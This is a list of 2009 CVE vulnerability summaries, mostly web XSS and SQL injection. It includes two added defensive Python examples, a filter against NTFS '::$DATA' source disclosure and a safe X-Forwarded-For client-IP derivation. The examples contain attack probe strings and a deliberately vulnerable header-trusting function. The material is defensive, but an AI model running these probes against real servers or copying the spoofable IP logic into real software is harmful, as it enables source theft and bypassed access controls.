[CVE-2009-3562] Cross-site scripting (XSS) vulnerability in Xerver HTTP Server 4.32 allows remote attackers to inject arbitrary web script or HTML via the currentPath parameter in a chooseDirectory action.
[CVE-2009-3553] Use-after-free vulnerability in the abstract file-descriptor handling interface in the cupsdDoSelect function in scheduler/select.c in the scheduler in cupsd in CUPS 1.3.7 and 1.3.10 allows remote attackers to cause a denial of service (daemon crash or hang) via a client disconnection during listing of a large number of print jobs, related to improperly maintaining a reference count. NOTE: some of these details are obtained from third party information.
[CVE-2009-3544] Xerver HTTP Server 4.32 allows remote attackers to obtain the source code for a web page via an HTTP request with the addition of ::$DATA after the HTML file name.
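CVE-2009-3544 above and CVE-2009-3646 (InterVations NaviCOPA) describe the same classic Windows trick: appending the NTFS alternate data stream suffix ::$DATA to a file name makes the server open the same file but skip the handler keyed on the .html/.asp extension, so it ships the raw source. The filter below is an added example written for this listing, not code from either vendor; it shows the check a static-file handler should apply to a request path before touching the filesystem. The encoding assumptions (single or double percent-encoding, trailing dot and space stripping by Win32) are general NTFS/HTTP behaviour, not details from the advisories.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote


def safe_static_path(url_path: str) -> Optional[str]:
    """Return a canonical request path for a static file, or None to refuse it.

    Refuses the NTFS stream/attribute syntax (name::$DATA) behind
    CVE-2009-3544 and CVE-2009-3646, plus the neighbouring file-name tricks,
    after the percent-decoding the server itself would perform.
    """
    decoded = unquote(url_path)
    if "%" in decoded:
        # Double-encoded input: decode once more so %253A does not slip past the ':' test.
        decoded = unquote(decoded)
    if "\x00" in decoded or "\\" in decoded:
        return None                       # NUL truncation / backslash separator games
    if ":" in decoded:
        return None                       # ':' is illegal in NTFS names; only stream syntax uses it
    if ".." in decoded.split("/"):
        return None                       # refuse traversal outright rather than collapsing it
    norm = posixpath.normpath("/" + decoded.lstrip("/"))
    last = norm.rsplit("/", 1)[-1]
    if last != last.rstrip(". "):
        return None                       # Win32 strips trailing dots/spaces: "a.html." opens a.html
    return norm


if __name__ == "__main__":
    for probe in ("/index.html", "/index.html::$DATA", "/index.html%3A%3A%24DATA"):
        print(probe, "->", safe_static_path(probe))
```

A scanner-side counterpart is the same idea in reverse: request the page twice, once plain and once with ::$DATA appended, and treat a second response that differs from the first and contains server-side markup as a finding.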
[CVE-2009-3540] Cross-site scripting (XSS) vulnerability in listads.php in YourFreeWorld Ultra Classifieds Pro allows remote attackers to inject arbitrary web script or HTML via the cn parameter. NOTE: the provenance of this information is unknown.
[CVE-2009-3539] Multiple cross-site scripting (XSS) vulnerabilities in YourFreeWorld Ultra Classifieds Pro allow remote attackers to inject arbitrary web script or HTML via the (1) cname parameter to subclass.php and the (2) sn parameter to listads.php.
[CVE-2009-3530] Cross-site scripting (XSS) vulnerability in storefront.php in RadScripts RadBids Gold 4 allows remote attackers to inject arbitrary web script or HTML via the mode parameter.
[CVE-2009-3521] Multiple cross-site scripting (XSS) vulnerabilities in the Visualization Engine (VE) in IBM Tivoli Composite Application Manager for WebSphere (ITCAM) 6.1.0 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-3513] Multiple cross-site scripting (XSS) vulnerabilities in Pilot Group (PG) eTraining allow remote attackers to inject arbitrary web script or HTML via (1) the cat_id parameter to courses_login.php, the id parameter to (2) news_read.php or (3) lessons_login.php, or (4) the cur parameter in a start action to lessons_login.php.
[CVE-2009-3512] Multiple cross-site scripting (XSS) vulnerabilities in MyWeight 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) date parameter to user_addfood.php, info parameter to (2) user_forgot_pwd_form.php and (3) user_login.php, and (4) return parameter to user_login.php.
[CVE-2009-3509] Cross-site scripting (XSS) vulnerability in admin/admin_index.php in CJ Dynamic Poll PRO 2.0 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO.
[CVE-2009-3506] Multiple cross-site scripting (XSS) vulnerabilities in CMSphp 0.21 allow remote attackers to inject arbitrary web script or HTML via the (1) cook_user parameter to index.php and the (2) name parameter to modules.php.
[CVE-2009-3496] Cross-site scripting (XSS) vulnerability in view_mag.php in Vastal I-Tech DVD Zone allows remote attackers to inject arbitrary web script or HTML via the mag_id parameter.
[CVE-2009-3493] Multiple cross-site scripting (XSS) vulnerabilities in Zenas PaoBacheca Guestbook 2.1 allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to (1) scrivi.php and (2) index.php.
[CVE-2009-3488] Cross-site scripting (XSS) vulnerability in the Bibliography (aka Biblio) module 6.x-1.6 for Drupal allows remote authenticated users, with certain content-creation privileges, to inject arbitrary web script or HTML via the Title field, probably a different vulnerability than CVE-2009-3479.
[CVE-2009-3481] A certain interface in the iCRM Basic (com_icrmbasic) component 1.4.2.31 for Joomla! does not require administrative authentication, which has unspecified impact and remote attack vectors. NOTE: the provenance of this information is unknown.
[CVE-2009-3479] Cross-site scripting (XSS) vulnerability in Bibliography (Biblio) 5.x before 5.x-1.17 and 6.x before 6.x-1.6, a module for Drupal, allows remote attackers, with "create content displayed by the Bibliography module" permissions, to inject arbitrary web script or HTML via a title.
[CVE-2009-3469] Cross-site scripting (XSS) vulnerability in profiles/html/simpleSearch.do in IBM Lotus Connections 2.0.1 allows remote attackers to inject arbitrary web script or HTML via the name parameter.
[CVE-2009-3467] Cross-site scripting (XSS) vulnerability in an unspecified method in Adobe ColdFusion 8.0, 8.0.1, and 9.0 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2009-3466] Adobe Shockwave Player before 11.5.2.602 allows remote attackers to execute arbitrary code via a crafted web page that triggers memory corruption, related to an "invalid string length vulnerability." NOTE: some of these details are obtained from third party information.
[CVE-2009-3465] Adobe Shockwave Player before 11.5.2.602 allows remote attackers to execute arbitrary code via crafted Shockwave content on a web site, related to an "invalid pointer vulnerability," a different issue than CVE-2009-3464. NOTE: some of these details are obtained from third party information.
[CVE-2009-3464] Adobe Shockwave Player before 11.5.2.602 allows remote attackers to execute arbitrary code via crafted Shockwave content on a web site, related to an "invalid pointer vulnerability," a different issue than CVE-2009-3465. NOTE: some of these details are obtained from third party information.
[CVE-2009-3463] Array index error in Adobe Shockwave Player before 11.5.2.602 allows remote attackers to execute arbitrary code via crafted Shockwave content on a web site. NOTE: some of these details are obtained from third party information.
[CVE-2009-3457] Cisco ACE XML Gateway (AXG) and ACE Web Application Firewall (WAF) before 6.1 allow remote attackers to obtain sensitive information via an HTTP request that lacks a handler, as demonstrated by (1) an OPTIONS request or (2) a crafted GET request, leading to a Message-handling Errors message containing a certain client intranet IP address, aka Bug ID CSCtb82159.
[CVE-2009-3453] Multiple cross-site scripting (XSS) vulnerabilities in IBM Lotus Quickr 8.1.0 services for WebSphere Portal allow remote attackers to inject arbitrary web script or HTML via the filename of a .odt file in a Lotus Quickr place, related to the Library template.
[CVE-2009-3452] WebCoreModule.ashx in RADactive I-Load before 2008.2.5.0 allows remote attackers to obtain sensitive information via unspecified requests that trigger responses containing the saved-image folder pathname.
[CVE-2009-3451] Directory traversal vulnerability in WebCoreModule.ashx in RADactive I-Load before 2008.2.5.0 allows remote attackers to read arbitrary files via unspecified vectors.
[CVE-2009-3450] Multiple cross-site scripting (XSS) vulnerabilities in WebCoreModule.ashx in RADactive I-Load before 2008.2.5.0 allow remote attackers to inject arbitrary web script or HTML via parameters with names beginning with __ (underscore underscore) sequences, which are incompatible with an XSS protection mechanism provided by Microsoft ASP.NET.
[CVE-2009-3444] Cross-site scripting (XSS) vulnerability in email.php in e107 0.7.16 and earlier allows remote attackers to inject arbitrary web script or HTML via the HTTP Referer header in a news.1 (aka news to email) action.
[CVE-2009-3440] Cross-site scripting (XSS) vulnerability in Open Source Security Information Management (OSSIM) before 2.1.2 allows remote attackers to inject arbitrary web script or HTML via the option parameter to the default URI (aka the main menu).
[CVE-2009-3437] Cross-site scripting (XSS) vulnerability in the live preview feature in the Markdown Preview module 6.x for Drupal allows remote attackers to inject arbitrary web script or HTML via "Markdown input."
[CVE-2009-3436] Multiple SQL injection vulnerabilities in forum.asp in MaxWebPortal allow remote attackers to execute arbitrary SQL commands via the (1) FORUM_ID or (2) CAT_ID parameter. NOTE: this might overlap CVE-2005-1417.
[CVE-2009-3435] Cross-site scripting (XSS) vulnerability in the variable editor in the Devel module 5.x before 5.x-1.2 and 6.x before 6.x-1.18, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via a variable name.
[CVE-2009-3427] Cross-site scripting (XSS) vulnerability in Kayako SupportSuite 3.50.06 allows remote attackers to inject arbitrary web script or HTML via the subject field in a ticket.
[CVE-2009-3420] Multiple cross-site scripting (XSS) vulnerabilities in index.php in the Publisher module 2.0 for Miniweb allow remote attackers to inject arbitrary web script or HTML via the (1) begin parameter and the (2) PATH_INFO.
[CVE-2009-3419] SQL injection vulnerability in index.php in the Publisher module 2.0 for Miniweb allows remote attackers to execute arbitrary SQL commands via the historymonth parameter.
[CVE-2009-3399] Unspecified vulnerability in the WebLogic Server component in BEA Product Suite 7.0.6 and 8.1.5 allows remote attackers to affect integrity, related to WLS Console.
[CVE-2009-3396] Unspecified vulnerability in the WebLogic Server component in BEA Product Suite 9.0, 9.1, 9.2.3, 10.0.1, and 10.3 allows remote attackers to affect integrity, related to WLS Console.
[CVE-2009-3384] Multiple unspecified vulnerabilities in WebKit in Apple Safari before 4.0.4 on Windows allow remote FTP servers to execute arbitrary code, cause a denial of service (application crash), or obtain sensitive information via a crafted directory listing in a reply.
[CVE-2009-3374] The XPCVariant::VariantDataToJS function in the XPCOM implementation in Mozilla Firefox 3.0.x before 3.0.15 and 3.5.x before 3.5.4 does not enforce intended restrictions on interaction between chrome privileged code and objects obtained from remote web sites, which allows remote attackers to execute arbitrary JavaScript with chrome privileges via unspecified method calls, related to "doubly-wrapped objects."
[CVE-2009-3371] Use-after-free vulnerability in Mozilla Firefox 3.5.x before 3.5.4 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code by creating JavaScript web-workers recursively.
[CVE-2009-3368] Cross-site scripting (XSS) vulnerability in the Hotel Booking Reservation System (aka HBS or com_hbssearch) component for Joomla! allows remote attackers to inject arbitrary web script or HTML via the adult parameter in a showhoteldetails action to index.php.
[CVE-2009-3367] Multiple cross-site scripting (XSS) vulnerabilities in An image gallery 1.0 allow remote attackers to inject arbitrary web script or HTML via the path parameter to (1) index.php and (2) main.php, and the (3) show parameter to main.php. NOTE: the provenance of this information is unknown.
[CVE-2009-3363] Cross-site scripting (XSS) vulnerability in the BUEditor module 5.x before 5.x-1.2 and 6.x before 6.x-1.4, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via input to the "plain textarea editor."
[CVE-2009-3360] Multiple cross-site scripting (XSS) vulnerabilities in Datemill 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) return parameter to photo_view.php, and st parameter to (2) photo_search.php and (3) search.php.
[CVE-2009-3359] Multiple cross-site scripting (XSS) vulnerabilities in Match Agency BiZ 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) important parameter to edit_profile.php and (2) pid parameter to report.php.
[CVE-2009-3355] Cross-site scripting (XSS) vulnerability in profile.php in Datetopia Buy Dating Site 1.0 allows remote attackers to inject arbitrary web script or HTML via the s_r parameter.
[CVE-2009-3348] Cross-site scripting (XSS) vulnerability in Datavore Gyro 5.0 allows remote attackers to inject arbitrary web script or HTML via the cid parameter in a cat action to the home component.
[CVE-2009-3343] SQL injection vulnerability in details.asp in HotWeb Rentals allows remote attackers to execute arbitrary SQL commands via the PropId parameter.
[CVE-2009-3339] Unspecified vulnerability in McAfee Email and Web Security Appliance 5.1 VMtrial allows remote attackers to read arbitrary files via unknown vectors, as demonstrated by a certain module in VulnDisco Pack Professional 8.9 through 8.11. NOTE: as of 20090917, this disclosure has no actionable information. However, because the VulnDisco Pack author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes.
[CVE-2009-3328] Cross-site scripting (XSS) vulnerability in sign.php in WX-Guestbook 1.1.208 allows remote attackers to inject arbitrary web script or HTML via the sName parameter (aka the name field). NOTE: some of these details are obtained from third party information.
[CVE-2009-3320] Cross-site scripting (XSS) vulnerability in scrivi.php in Zenas PaoLink (aka Pao-Link) 1.0 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO.
[CVE-2009-3311] Cross-site scripting (XSS) vulnerability in index.php in RSSMediaScript allows remote attackers to inject arbitrary web script or HTML via the page parameter.
[CVE-2009-3303] Cross-site scripting (XSS) vulnerability in www/help/tracker.php in GForge 4.5.14, 4.7 rc2, and 4.8.1 allows remote attackers to inject arbitrary web script or HTML via the helpname parameter.
[CVE-2009-3300] Multiple cross-site scripting (XSS) vulnerabilities in the Identity Provider (IdP) 1.3.x before 1.3.4 and 2.x before 2.1.5, and the Service Provider 1.3.x before 1.3.5 and 2.x before 2.3, in Internet2 Middleware Initiative Shibboleth allow remote attackers to inject arbitrary web script or HTML via URLs that are encountered in redirections, and appear in automatically generated forms.
[CVE-2009-3299] Cross-site scripting (XSS) vulnerability in the resume blocktype in Mahara before 1.0.13, and 1.1.x before 1.1.7, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-3287] lib/thin/connection.rb in Thin web server before 1.2.4 relies on the X-Forwarded-For header to determine the IP address of the client, which allows remote attackers to spoof the IP address and hide activities via a modified X-Forwarded-For header.
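The Thin entry above is a bug class rather than a one-off: any server that reads X-Forwarded-For without first checking who sent it lets the client name its own IP, which defeats IP-based logging, rate limits and allow-lists. The code below is an added example, not Thin's code or the Thin fix; it contrasts the naive lookup the advisory describes with the usual safe derivation, which only consults the header when the TCP peer is one of your own proxies and then walks the chain from the right. The trusted range 10.0.0.0/8 and the addresses in the calls are constructed for the example.

```python
import ipaddress
from typing import Iterable, Optional

# Constructed for this example: the range our own reverse proxies connect from.
# Assumption, not from the advisory: one proxy tier living in 10.0.0.0/8.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]


def naive_client_ip(remote_addr: str, xff: Optional[str]) -> str:
    """The pattern behind CVE-2009-3287: believe X-Forwarded-For whoever the peer is.

    A client connecting directly can send the header itself, so the result
    is attacker-chosen.
    """
    if xff:
        return xff.split(",")[0].strip()
    return remote_addr


def _is_trusted(addr: str, trusted: Iterable) -> bool:
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False
    return any(ip in net for net in trusted)


def client_ip(remote_addr: str, xff: Optional[str],
              trusted: Iterable = TRUSTED_PROXIES) -> str:
    """Derive the client IP without trusting attacker-controlled hops.

    Only consult X-Forwarded-For when the socket peer is one of our proxies,
    then walk the header from the right (the hop our proxy appended) back to
    the first address that is not a trusted proxy. Anything the client put in
    the header itself sits further left and is never reached.
    """
    trusted = tuple(trusted)
    if not _is_trusted(remote_addr, trusted):
        return remote_addr            # direct connection: the header is hearsay
    hops = [h.strip() for h in (xff or "").split(",") if h.strip()]
    for hop in reversed(hops):
        if _is_trusted(hop, trusted):
            continue                  # one of ours; keep walking left
        try:
            ipaddress.ip_address(hop)
        except ValueError:
            return remote_addr        # malformed hop: fall back to the socket peer
        return hop
    return remote_addr                # empty header or only proxies: the peer is the client


if __name__ == "__main__":
    # Direct connection carrying a forged header: naive code is fooled, the safe version is not.
    print(naive_client_ip("203.0.113.9", "1.2.3.4"))   # 1.2.3.4 (spoofed)
    print(client_ip("203.0.113.9", "1.2.3.4"))         # 203.0.113.9
    # Through our proxy, with a forged hop prepended by the client: the forged hop is ignored.
    print(client_ip("10.0.0.5", "1.2.3.4, 198.51.100.7"))   # 198.51.100.7
```

The same rule applies to X-Real-IP and Forwarded: a proxy must overwrite or append, never pass through, and the application must know the proxy's addresses rather than the header's shape.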
[CVE-2009-3284] Directory traversal vulnerability in phpspot PHP BBS, PHP Image Capture BBS, PHP & CSS BBS, PHP BBS CE, PHP_RSS_Builder, and webshot, dated before 20090914, allows remote attackers to read arbitrary files via unspecified vectors.
[CVE-2009-3283] Cross-site scripting (XSS) vulnerability in phpspot PHP BBS, PHP Image Capture BBS, PHP & CSS BBS, PHP BBS CE, PHP_RSS_Builder, and webshot, dated before 20090914, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to cookies.
[CVE-2009-3272] Stack consumption vulnerability in WebKit.dll in WebKit in Apple Safari 3.2.3, and possibly other versions before 4.1.2, allows remote attackers to cause a denial of service (application crash) via JavaScript code that calls eval on a long string composed of A/ sequences.
[CVE-2009-3265] Cross-site scripting (XSS) vulnerability in Opera 9 and 10 allows remote attackers to inject arbitrary web script or HTML via a (1) RSS or (2) Atom feed, related to the rendering of the application/rss+xml content type as "scripted content." NOTE: the vendor reportedly considers this behavior a "design feature," not a vulnerability.
[CVE-2009-3264] The getSVGDocument method in Google Chrome before 3.0.195.21 omits an unspecified "access check," which allows remote web servers to bypass the Same Origin Policy and conduct cross-site scripting attacks via unknown vectors, related to a user's visit to a different web server that hosts an SVG document.
[CVE-2009-3263] Cross-site scripting (XSS) vulnerability in Google Chrome 2.x and 3.x before 3.0.195.21 allows remote attackers to inject arbitrary web script or HTML via a (1) RSS or (2) Atom feed, related to the rendering of the application/rss+xml content type as XML "active content."
[CVE-2009-3262] Cross-site scripting (XSS) vulnerability in the Self Service UI (SSUI) in IBM Tivoli Identity Manager (ITIM) 5.0.0.5 allows remote authenticated users to inject arbitrary web script or HTML via the last name field in a profile.
[CVE-2009-3260] Cross-site scripting (XSS) vulnerability in LiveStreet 0.2 allows remote attackers to inject arbitrary web script or HTML via the header of the topic in a comment.
[CVE-2009-3256] Cross-site scripting (XSS) vulnerability in include/ajax/blogInfo.php in LiveStreet 0.2 allows remote attackers to inject arbitrary web script or HTML via the URI, as demonstrated by a SCRIPT element in an arbitrary parameter such as the asd parameter.
[CVE-2009-3247] Cross-site scripting (XSS) vulnerability in the Activities module in vtiger CRM 5.0.4 allows remote attackers to inject arbitrary web script or HTML via the action parameter to phprint.php. NOTE: the query_string vector is already covered by CVE-2008-3101.
[CVE-2009-3240] Cross-site scripting (XSS) vulnerability in the Happy Linux XF-Section module 1.12a for XOOPS allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-3227] Cross-site scripting (XSS) vulnerability in index.php in AlmondSoft Almond Classifieds Ads Enterprise and Almond Affiliate Network Classifieds allows remote attackers to inject arbitrary web script or HTML via the city parameter in a search action. NOTE: some of these details are obtained from third party information.
[CVE-2009-3225] Multiple cross-site scripting (XSS) vulnerabilities in AlmondSoft Almond Classifieds Wap and Pro, and possibly Almond Affiliate Network Classifieds, allow remote attackers to inject arbitrary web script or HTML via (1) the page parameter in a browse action to index.php or (2) the addr parameter to gmap.php. NOTE: some of these details are obtained from third party information.
[CVE-2009-3222] Cross-site scripting (XSS) vulnerability in index.php in FreeWebScriptz Honest Traffic (FWSHT) 1.x allows remote attackers to inject arbitrary web script or HTML via the msg parameter.
[CVE-2009-3219] Directory traversal vulnerability in a.php in AR Web Content Manager (AWCM) 2.1, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the a parameter.
[CVE-2009-3218] SQL injection vulnerability in control/login.php in AR Web Content Manager (AWCM) 2.1, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the username parameter.
[CVE-2009-3210] Multiple cross-site scripting (XSS) vulnerabilities in the Print (aka Printer, e-mail and PDF versions) module 5.x before 5.x-4.8 and 6.x before 6.x-1.8, a module for Drupal, allow remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-3206] Multiple cross-site scripting (XSS) vulnerabilities in the ImageCache module 5.x before 5.x-2.5 and 6.x before 6.x-2.0-beta10, a module for Drupal, allow remote authenticated users, with "administer imagecache" permissions, to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-3204] Multiple cross-site scripting (XSS) vulnerabilities in Stiva Forum 1.0 allow remote attackers to inject arbitrary web script or HTML via the id parameter to (1) demo.php and (2) forum.php, and the PATH_INFO to (3) include_forum.php.
[CVE-2009-3202] Cross-site scripting (XSS) vulnerability in search.php in ULoKI PHP Forum 2.1 allows remote attackers to inject arbitrary web script or HTML via the term parameter.
[CVE-2009-3199] Uebimiau Webmail 3.2.0-2.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database with usernames and password hashes via a direct request for system_admin/admin.ucf.
[CVE-2009-3198] Cross-site scripting (XSS) vulnerability in search.php in JCE-Tech Affiliate Master Datafeed Parser Script 2.0 allows remote attackers to inject arbitrary web script or HTML via the search parameter.
[CVE-2009-3197] Cross-site scripting (XSS) vulnerability in search.php in JCE-Tech PHP Calendars Script allows remote attackers to inject arbitrary web script or HTML via the search parameter.
[CVE-2009-3196] Cross-site scripting (XSS) vulnerability in index.php in JCE-Tech PHP Video Script allows remote attackers to inject arbitrary web script or HTML via the key parameter.
[CVE-2009-3195] Multiple cross-site scripting (XSS) vulnerabilities in JCE-Tech Auction RSS Content Script 3.0 allow remote attackers to inject arbitrary web script or HTML via the id parameter to (1) rss.php and (2) search.php.
[CVE-2009-3194] Cross-site scripting (XSS) vulnerability in index.php in JCE-Tech SearchFeed Script allows remote attackers to inject arbitrary web script or HTML via the search parameter.
[CVE-2009-3192] Multiple cross-site scripting (XSS) vulnerabilities in index.php in LinkorCMS 1.2 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the searchstr parameter in a search action
[CVE-2009-3191] Multiple cross-site scripting (XSS) vulnerabilities in PAD Site Scripts 3.6 allow remote attackers to inject arbitrary web script or HTML via the cat parameter to (1) rss.php and (2) opml.php.
[CVE-2009-3189] Cross-site scripting (XSS) vulnerability in search.php in DigiOz Guestbook 1.7.2 allows remote attackers to inject arbitrary web script or HTML via the search_term parameter.
[CVE-2009-3187] Cross-site scripting (XSS) vulnerability in gamelist.php in Stand Alone Arcade 1.1 allows remote attackers to inject arbitrary web script or HTML via the cat parameter.
[CVE-2009-3186] Multiple cross-site scripting (XSS) vulnerabilities in VideoGirls BiZ allow remote attackers to inject arbitrary web script or HTML via the (1) t parameter to forum.php, (2) profile_name parameter to profile.php, and (3) p parameter to view.php.
[CVE-2009-3171] Multiple cross-site scripting (XSS) vulnerabilities in Anantasoft Gazelle CMS 1.0 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) user parameter to user.php or (2) lookup parameter to search.php.
[CVE-2009-3166] token.cgi in Bugzilla 3.4rc1 through 3.4.1 places a password in a URL at the beginning of a login session that occurs immediately after a password reset, which allows context-dependent attackers to discover passwords by reading (1) web-server access logs, (2) web-server Referer logs, or (3) the browser history.
[CVE-2009-3165] SQL injection vulnerability in the Bug.create WebService function in Bugzilla 2.23.4 through 3.0.8, 3.1.1 through 3.2.4, and 3.3.1 through 3.4.1 allows remote attackers to execute arbitrary SQL commands via unspecified parameters.
[CVE-2009-3164] Unspecified vulnerability in the IPv6 networking stack in Sun Solaris 10, and OpenSolaris snv_01 through snv_82 and snv_111 through snv_122, when a Cassini GigaSwift Ethernet Adapter (aka CE) interface is used, allows remote attackers to cause a denial of service (panic) via vectors involving jumbo frames. NOTE: this issue exists because of an incomplete fix for CVE-2009-2136.
[CVE-2009-3162] Cross-site scripting (XSS) vulnerability in Multi Website 1.5 allows remote attackers to inject arbitrary web script or HTML via the search parameter in a search action to the default URI.
[CVE-2009-3161] The server in IBM WebSphere MQ 7.0.0.1, 7.0.0.2, and 7.0.1.0 allows attackers to cause a denial of service (trap) or possibly have unspecified other impact via malformed data.
[CVE-2009-3160] IBM WebSphere MQ 6.x through 6.0.2.7, 7.0.0.0, 7.0.0.1, 7.0.0.2, and 7.0.1.0, when read ahead or asynchronous message consumption is enabled, allows attackers to have an unspecified impact via unknown vectors, related to a "memory overwrite" issue.
[CVE-2009-3159] Unspecified vulnerability in the rriDecompress function in IBM WebSphere MQ 7.0.0.0, 7.0.0.1, and 7.0.0.2 allows remote attackers to cause a denial of service via unknown vectors.
[CVE-2009-3158] admin/files.php in simplePHPWeb 0.2 does not require authentication, which allows remote attackers to perform unspecified administrative actions via unknown vectors. NOTE: some of these details are obtained from third party information.
[CVE-2009-3157] Cross-site scripting (XSS) vulnerability in the Calendar module 6.x before 6.x-2.2 for Drupal allows remote authenticated users, with "create new content types" privileges, to inject arbitrary web script or HTML via the title of a content type.
[CVE-2009-3156] Cross-site scripting (XSS) vulnerability in the Date Tools sub-module in the Date module 6.x before 6.x-2.3 for Drupal allows remote authenticated users, with "use date tools" or "administer content types" privileges, to inject arbitrary web script or HTML via a "Content type label" field.
[CVE-2009-3155] Cross-site scripting (XSS) vulnerability in gmap.php in the Almond Classifieds (com_aclassf) component 7.5 for Joomla! allows remote attackers to inject arbitrary web script or HTML via the addr parameter.
[CVE-2009-3153] Multiple cross-site scripting (XSS) vulnerabilities in x10 MP3 Search engine 1.6.5 allow remote attackers to inject arbitrary web script or HTML via the (1) pic_id parameter to includes/video_ad.php, (2) category parameter to linkvideos_listing.php, id parameter to (3) templates/header1.php and (4) mp3/lyrics.php, key parameter to (5) video_listing.php and (6) adult/video_listing.php, and name parameter to (7) mp3/embed.php and (8) mp3/info.php.
[CVE-2009-3152] Multiple cross-site scripting (XSS) vulnerabilities in becommunity/community/index.php in NTSOFT BBS E-Market Professional allow remote attackers to inject arbitrary web script or HTML via the (1) page, (2) bt_code, and (3) b_no parameters in a board view action.
[CVE-2009-3150] SQL injection vulnerability in index.php in Multi Website 1.5 allows remote attackers to execute arbitrary SQL commands via the Browse parameter in a vote action.
[CVE-2009-3147] Cross-site scripting (XSS) vulnerability in showproduct.php in ReviewPost Pro vB3 allows remote attackers to inject arbitrary web script or HTML via the date parameter.
[CVE-2009-3146] Cross-site scripting (XSS) vulnerability in search_advance.php in ArticleFriend Script allows remote attackers to inject arbitrary web script or HTML via the SearchWd parameter. NOTE: the provenance of this information is unknown.
[CVE-2009-3126] Integer overflow in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a crafted PNG image file, aka "GDI+ PNG Integer Overflow Vulnerability."
[CVE-2009-3125] SQL injection vulnerability in the Bug.search WebService function in Bugzilla 3.3.2 through 3.4.1, and 3.5, allows remote attackers to execute arbitrary SQL commands via unspecified parameters.
[CVE-2009-3121] Cross-site scripting (XSS) vulnerability in the Ajax Table module 5.x for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-3120] Cross-site scripting (XSS) vulnerability in public/index.php in BIGACE Web CMS 2.6 allows remote attackers to inject arbitrary web script or HTML via the id parameter. NOTE: some of these details are obtained from third party information.
[CVE-2009-3106] The Servlet Engine/Web Container component in IBM WebSphere Application Server (WAS) 6.0.2 before 6.0.2.37 does not properly implement security constraints on the (1) doGet and (2) doTrace methods, which allows remote attackers to bypass intended access restrictions and obtain sensitive information via a crafted HTTP HEAD request to a Web Application.
[CVE-2009-3105] Cross-site scripting (XSS) vulnerability in IBM Lotus iNotes (aka Domino Web Access or DWA) before 211.241 for Domino 8.0.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka SPR EZEL7UURYC.
[CVE-2009-3068] Unrestricted file upload vulnerability in the RoboHelpServer Servlet (robohelp/server) in Adobe RoboHelp Server 8 allows remote attackers to execute arbitrary code by uploading a Java Archive (.jsp) file during a PUBLISH action, then accessing it via a direct request to the file in the robohelp/robo/reserved/web directory under its sessionid subdirectory, as demonstrated by the vd_adobe module in VulnDisco Pack Professional 8.7 through 8.11.
[CVE-2009-3067] Cross-site scripting (XSS) vulnerability in index.php in Reservation Manager allows remote attackers to inject arbitrary web script or HTML via the resman_startdate parameter.
[CVE-2009-3066] Multiple cross-site scripting (XSS) vulnerabilities in PropertyWatchScript.com Property Watch 2.0 allow remote attackers to inject arbitrary web script or HTML via the (1) videoid parameter to tools/email.php and (2) redirect parameter to tools/login.php.
[CVE-2009-3060] Multiple cross-site scripting (XSS) vulnerabilities in Joker Board (aka JBoard) 2.0 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the notice parameter to editform.php, (2) the edit_user_message parameter to core/edit_user_message.php, or (3) the user_title parameter to inc/head.inc.php, reachable through any PHP script.
[CVE-2009-3057] Multiple cross-site scripting (XSS) vulnerabilities in AOM Software Beex 3 allow remote attackers to inject arbitrary web script or HTML via the navaction parameter to (1) news.php and (2) partneralle.php.
[CVE-2009-3036] Cross-site scripting (XSS) vulnerability in the console in Symantec IM Manager 8.3 and 8.4 before 8.4.13 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-3035] The web console in Symantec Altiris Notification Server 6.0.x before 6.0 SP3 R12 uses a hardcoded key that can decrypt SQL Server credentials and certain discovery credentials, and stores this key on the Notification Server machine, which allows local users to obtain sensitive information and possibly execute arbitrary code by decrypting and using these credentials.
[CVE-2009-3033] Buffer overflow in the RunCmd method in the Altiris eXpress NS Console Utilities ActiveX control in AeXNSConsoleUtilities.dll in the web console in Symantec Altiris Deployment Solution 6.9.x, Altiris Notification Server 6.0.x, and Management Platform 7.0.x allows remote attackers to execute arbitrary code via a long string in the second argument.
[CVE-2009-3030] Cross-site scripting (XSS) vulnerability in Symantec SecurityExpressions Audit and Compliance Server 4.1.1, 4.1, and earlier allows remote attackers to inject arbitrary web script or HTML via vectors that trigger an error message in a response, related to an "HTML Injection issue."
